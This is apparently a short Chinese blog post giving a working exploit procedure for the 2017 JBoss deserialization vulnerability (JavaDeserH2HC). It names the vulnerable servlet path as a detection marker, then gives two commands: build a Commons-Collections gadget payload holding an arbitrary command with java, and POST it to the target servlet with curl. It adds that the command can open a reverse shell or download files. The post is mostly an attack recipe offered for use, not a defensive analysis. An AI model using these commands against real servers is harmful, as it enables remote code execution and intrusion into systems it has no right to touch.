JavaDeserH2HC

JBOSS反序列化漏洞 在17年4月份被爆的 具体判断特征为:

jbossmq-httpil/HTTPServerILServlet/

是否存在该目录

exp利用方法

步骤1:

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 ‘you command’

步骤2:

curl xxx/jbossmq-httpil/HTTPServerILServlet –data-binary @ExampleCommonsCollections1.ser

 

即可

在命令中可以直接反弹也可以下载等 自行判断jboss部署系统。

发表评论

电子邮件地址不会被公开。 必填项已用*标注